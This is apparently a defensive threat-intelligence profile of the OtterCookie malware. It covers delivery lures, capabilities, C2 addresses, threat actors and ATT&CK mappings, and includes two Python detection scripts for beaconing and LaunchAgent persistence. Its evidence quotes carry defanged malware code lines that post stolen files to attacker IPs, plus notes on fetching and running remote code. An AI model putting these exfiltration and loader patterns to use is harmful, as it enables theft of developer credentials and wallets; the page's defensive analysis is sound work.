OtterCookie

OtterCookie is a JavaScript/Node.js malware family used in DPRK-linked developer-targeting operations associated with Contagious Interview and overlapping clusters tracked as Lazarus, Famous Chollima, PurpleBravo, WageMole, and DeceptiveDevelopment. The content consistently describes it as a backdoor/RAT with infostealing functionality, distinct from BeaverTail and often used alongside BeaverTail and InvisibleFerret in phased infection chains targeting software developers, especially Web3, DeFi, AI, and cryptocurrency-related personnel.

Observed delivery vectors include trojanized coding challenges and repositories delivered through fake job offers, malicious GitHub and Bitbucket projects, Google Docs lures, trojanized open-source software such as a 3D chess project, and malicious npm packages including gemini-ai-checker, express-flowlimit, chai-extensions-extras, and broader late-2025 npm waves. Related reporting also ties OtterCookie-linked infrastructure patterns to malicious packages such as chai-as-init and other dependency-chain campaigns.

Functionally, OtterCookie is described as a live-surveillance implant that continuously collects data from active developer workstations rather than performing only a one-time sweep. Reported capabilities include clipboard theft, keystroke logging, screenshot capture, monitoring the active workspace on a 30-second interval, browser secret theft, developer credential theft, cryptocurrency wallet artifact theft, shell command execution, victim data exfiltration, and persistent command-and-control. Some reporting characterizes it as a Socket.IO-based backdoor that maintains a live roster of connected victims.

Its command-and-control is repeatedly described as using Socket.IO over Engine.IO v4. Infrastructure observed in the content includes Hetzner-hosted server 195.201.104.53, where port 6931 functioned as a live OtterCookie Socket.IO C2 broadcasting victim state every 30 seconds and port 6101 appeared to be an older predecessor C2. Additional reporting cites IP address 216.126.225.243 as a known DPRK OtterCookie C2, with one analyzed Node.js stealer sample using that IP on ports 8085, 8086, and 8087 for browser-data theft, file exfiltration, and reverse-shell/C2 traffic. Vercel-hosted staging and infrastructure patterns, including tetrismic.vercel.app and ipcheck-themed Vercel paths, are also associated with OtterCookie-related activity in the provided content.
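The two C2 traits described above, an Engine.IO v4 handshake and a 30-second check-in cadence, are the kind of thing a defender can hunt for in egress proxy logs. The following is an added example, not code from this page or from the cited reports: the log line format, the `KNOWN_SOCKETIO_HOSTS` allowlist and the sample lines are constructed, and only the C2 address and port come from the page.

```python
"""Hunt for Socket.IO (Engine.IO v4) beaconing in proxy logs. Added example, not code
from this page or the cited reports; it flags the two C2 traits the page describes for
OtterCookie: an Engine.IO v4 handshake and a ~30 s check-in cadence. Log format,
allowlist and sample lines are constructed; the C2 address:port is quoted on the page."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample lines: "<ts> <src> <dst:port> <method> <path>"
SAMPLE_LOG = """\
2025-11-02T10:00:00Z 10.0.0.12 195.201.104.53:6931 GET /socket.io/?EIO=4&transport=polling
2025-11-02T10:00:30Z 10.0.0.12 195.201.104.53:6931 GET /socket.io/?EIO=4&transport=polling&sid=a1
2025-11-02T10:01:00Z 10.0.0.12 195.201.104.53:6931 POST /socket.io/?EIO=4&transport=polling&sid=a1
2025-11-02T10:01:31Z 10.0.0.12 195.201.104.53:6931 GET /socket.io/?EIO=4&transport=polling&sid=a1
2025-11-02T10:00:05Z 10.0.0.12 registry.npmjs.org:443 GET /express
2025-11-02T10:07:11Z 10.0.0.12 registry.npmjs.org:443 GET /chai
2025-11-02T10:02:00Z 10.0.0.40 chat.corp.internal:443 GET /socket.io/?EIO=4&transport=polling
"""
# Constructed allowlist of internal services that legitimately speak Socket.IO.
KNOWN_SOCKETIO_HOSTS = {"chat.corp.internal:443"}
# Engine.IO v4 handshake: a /socket.io/ path whose query string carries EIO=4.
ENGINE_IO_V4 = re.compile(r"^/socket\.io/\?(?:.*&)?EIO=4(?:&|$)")
BEACON_SECONDS, TOLERANCE = 30, 5

def parse(log):
    """Yield (ts, src, dst, method, path) from the constructed line format."""
    for line in log.splitlines():
        ts, src, dst, method, path = line.split(maxsplit=4)
        yield datetime.fromisoformat(ts.replace("Z", "+00:00")), src, dst, method, path

def hunt(log):
    """Return sorted, de-duplicated (finding, src, dst) tuples."""
    findings, timeline = set(), defaultdict(list)
    for ts, src, dst, _method, path in parse(log):
        timeline[(src, dst)].append(ts)
        if ENGINE_IO_V4.match(path) and dst not in KNOWN_SOCKETIO_HOSTS:
            findings.add(("engine_io_v4_unknown_host", src, dst))
    for (src, dst), stamps in timeline.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # Three or more check-ins whose typical gap sits near the 30 s period.
        if len(gaps) >= 2 and abs(median(gaps) - BEACON_SECONDS) <= TOLERANCE:
            findings.add(("periodic_beacon_~30s", src, dst))
    return sorted(findings)

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(*finding)
```

The cadence check uses the median gap so a single missed or delayed check-in does not hide the pattern; tune `TOLERANCE` to your proxy's timestamp resolution.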

The malware is primarily associated with campaigns targeting developers globally through fraudulent recruiting workflows, especially in the cryptocurrency sector. Multiple sources in the content state that BeaverTail, OtterCookie, and InvisibleFerret are used together in infection chains that begin with fake interviews or coding assessments and culminate in credential theft, wallet theft, and broader compromise.

THREAT ACTORS

Groups observed using it

10 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

WageMole

This will eventually lead to either OtterCookie / BeaverTail malware. Running the entire repository ultimately leads to an infection.

via Medium, meeswicky1100 (medium.com)
Lazarus

The campaign used the JavaScript infostealer BeaverTail, the cross-platform Python backdoor InvisibleFerret, and most recently OtterCookie, a new backdoor identified in December 2024.

via Recorded Future blog (recordedfuture.com)
Contagious Interview

The campaign used the JavaScript infostealer BeaverTail, the cross-platform Python backdoor InvisibleFerret, and most recently OtterCookie, a new backdoor identified in December 2024.

via Recorded Future blog (recordedfuture.com)
CL-STA-0240

The campaign used the JavaScript infostealer BeaverTail, the cross-platform Python backdoor InvisibleFerret, and most recently OtterCookie, a new backdoor identified in December 2024.

via Recorded Future blog (recordedfuture.com)
TraderTraitor

The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families (BeaverTail, OtterCookie, and InvisibleFerret) in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.

via FalconFeeds blog (falconfeeds.io)
HexagonalRodent

The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families (BeaverTail, OtterCookie, and InvisibleFerret) in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.

via FalconFeeds blog (falconfeeds.io)
MITRE ATT&CK

Techniques & procedures

28 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1583.001 Domains (evidence: 1)

The chai-as-init package uses typosquatting, imitating the names of the popular chai and chai-as-promised packages.

Initial Access

3 techniques
T1189 Drive-by Compromise (evidence: 2)

With the unique fingerprint, we identified 77 malicious GitHub repositories... Running the entire repository ultimately leads to an infection.

T1195 Supply Chain Compromise (evidence: 2)

A malicious npm package (chai-as-init), disguised as a plugin for the well-known Chai.js test framework, was distributed in three versions, v1.4.5 through v1.4.7.

T1566.003 Spearphishing via Service (evidence: 2)

FAMOUS CHOLLIMA uses Google Docs to advertise fake jobs to steal data from developers... There are multiple tabs but they all lead to the same link: A Google Doc titled "Test Requirement", which details a coding test an interviewee must complete.

Execution

4 techniques
T1059 Command and Scripting Interpreter (evidence: 4)

This will eventually lead to either OtterCookie / BeaverTail malware. Running the entire repository ultimately leads to an infection.

T1059.007 JavaScript (evidence: 1)

As soon as the package is loaded, it downloads malicious code from an external server and executes it... the remote code is executed with new Function().

T1204.001 Malicious Link (evidence: 1)

The repository it links to has long been taken down, but it would have triggered a multi-stage infection chain leading to infostealing malware like OtterCookie or InvisibleFerret.

T1204.002 Malicious File (evidence: 1)

Running the entire repository ultimately leads to an infection.

Persistence

2 techniques
T1176 Software Extensions (evidence: 1)

Five trojanized browser extensions – Bitwarden, Phantom, TronLink, Trust Wallet, and a Brave/MetaMask-themed trojan – share a single boot sequence.

T1547 Boot or Logon Autostart Execution (evidence: 1)

macOS persistence pair from Part III: Login Items entry plus a per-user LaunchAgent referencing a Node process

Privilege Escalation

1 technique
T1547 Boot or Logon Autostart Execution (evidence: 1)

macOS persistence pair from Part III: Login Items entry plus a per-user LaunchAgent referencing a Node process

Stealth

2 techniques
T1027 Obfuscated Files or Information (evidence: 3)

By leveraging an advanced search pivot on GitHub that only discovers the encoded string for hxxps[:]//api-server-mocha[.]vercel[.]app... Where the decoded value is AUTH_AIP_KEY

T1564.003 Hidden Window (evidence: 1)

The child process is detached from the parent (detached), its output is hidden (stdio: 'ignore'), and it is set up to survive the parent's exit (child.unref()).

Credential Access

6 techniques
T1056 Input Capture (evidence: 1)

OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.

T1528 Steal Application Access Token (evidence: 1)

Collection class: Developer secrets. Behavior: .env files, SSH material, cloud credentials, source-control tokens, and adjacent on-disk secrets.

T1539 Steal Web Session Cookie (evidence: 1)

Collection class: Browser data. Behavior: Credential and cookie theft consistent with the broader Contagious Interview campaign.

T1552 Unsecured Credentials (evidence: 1)

Collection class: Developer secrets. Behavior: .env files, SSH material, cloud credentials, source-control tokens, and adjacent on-disk secrets.

T1555 Credentials from Password Stores (evidence: 2)

The first one is a browser credential stealer. It supports: Chrome, Brave, Edge, Opera, Opera GX, Vivaldi, Kiwi, Yandex, Iridium, Comodo Dragon, SRWare Iron, Chromium, AVG Browser.

T1649 Steal or Forge Authentication Certificates (evidence: 3)

The information exfiltrated immediately along with the environment variables includes high-risk credentials such as... AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN

Discovery

2 techniques
T1082 System Information Discovery (evidence: 2)

Collects the hostname with os.hostname(), the OS type and version with os.type() and os.release(), and the username with os.userInfo().

T1083 File and Directory Discovery (evidence: 1)

Recursively collects a file listing with fs.readdirSync(), excluding four specific directories.

Collection

4 techniques
T1005 Data from Local System (evidence: 3)

OtterCookie is capable of identifying cryptocurrency assets and sensitive information found in specific file types by using regex patterns, including executables, photos, and config and env files, among others.

T1056 Input Capture (evidence: 1)

OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.

T1113 Screen Capture (evidence: 2)

OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.

T1115 Clipboard Data (evidence: 2)

OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.

Command and Control

4 techniques
T1071 Application Layer Protocol (evidence: 4)

InvisibleFerret introduces additional malicious payloads into victim environments, performs information stealing and fingerprinting actions within the victim environment, and leverages legitimate protocols and software for C2 communications.

T1071.001 Web Protocols (evidence: 2)

All HTTP communications are performed via the Axios NPM package... const response = await axios.post(`hxxp://216[.]126[.]225[.]243:8086/upload`, form... Upon the first connection the following info is sent to the C2 via a POST request to hxxp://216[.]126[.]225[.]243:8087/api/notify

T1102.001 Dead Drop Resolver (evidence: 1)

Each extension reads it from a transaction payload on an Aptos mainnet account ... at runtime. ... The first thing each of the five extensions does on load is ask a public blockchain where its server is.

T1105 Ingress Tool Transfer (evidence: 1)

A second-stage loader (initializeCaller.js) communicates with the C2 server to fetch and execute the final payload.

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (evidence: 3)

Sent to the attacker server (hxxp://144.172.89[.]180:8086/upload) with axios.post
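The T1547 evidence above describes a per-user LaunchAgent that references a Node process. A triage routine for that trait, as an added example that is not code from this page or the cited report: the plist contents, the labels and the script path are constructed, and `USER_WRITABLE_PREFIXES` is an assumed heuristic, not a reported indicator.

```python
"""Triage macOS LaunchAgent plists for a per-user agent that launches a Node
process, the persistence trait quoted under T1547 above. Added example, not code
from this page or the cited report; labels, paths and plist contents are constructed."""
import plistlib

# Constructed plists: a vendor updater (benign) and one matching the trait.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.vendor.updater</string>
  <key>ProgramArguments</key><array><string>/Applications/Vendor.app/Contents/MacOS/updater</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array>
    <string>/usr/local/bin/node</string>
    <string>/Users/dev/.cache/helper/index.js</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

NODE_BINARIES = {"node", "nodejs"}
# Assumed heuristic: locations a non-admin user can write to; a LaunchAgent script here is unusual.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/")

def triage_launch_agent(raw):
    """Return the reasons this agent deserves review; an empty list means none."""
    plist = plistlib.loads(raw)
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    reasons = []
    if args[0].rsplit("/", 1)[-1] in NODE_BINARIES:
        reasons.append("runs a Node interpreter")
        script = next((a for a in args[1:] if a.endswith((".js", ".mjs", ".cjs"))), None)
        if script and script.startswith(USER_WRITABLE_PREFIXES):
            reasons.append(f"script in user-writable path: {script}")
        if plist.get("RunAtLoad") and plist.get("KeepAlive"):
            reasons.append("RunAtLoad + KeepAlive keeps it resident")
    return reasons

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN_PLIST), ("suspect", SUSPECT_PLIST)):
        print(name, triage_launch_agent(raw) or ["nothing to report"])
```

On a live host, feed it the bytes of each file under `~/Library/LaunchAgents/`; pair the results with the Login Items list to cover both halves of the persistence pair the evidence describes.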

INDICATORS OF COMPROMISE

IOCs tracked for this family

122 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
70 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
14 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
38 tracked

Other indicator types observed in public reporting.
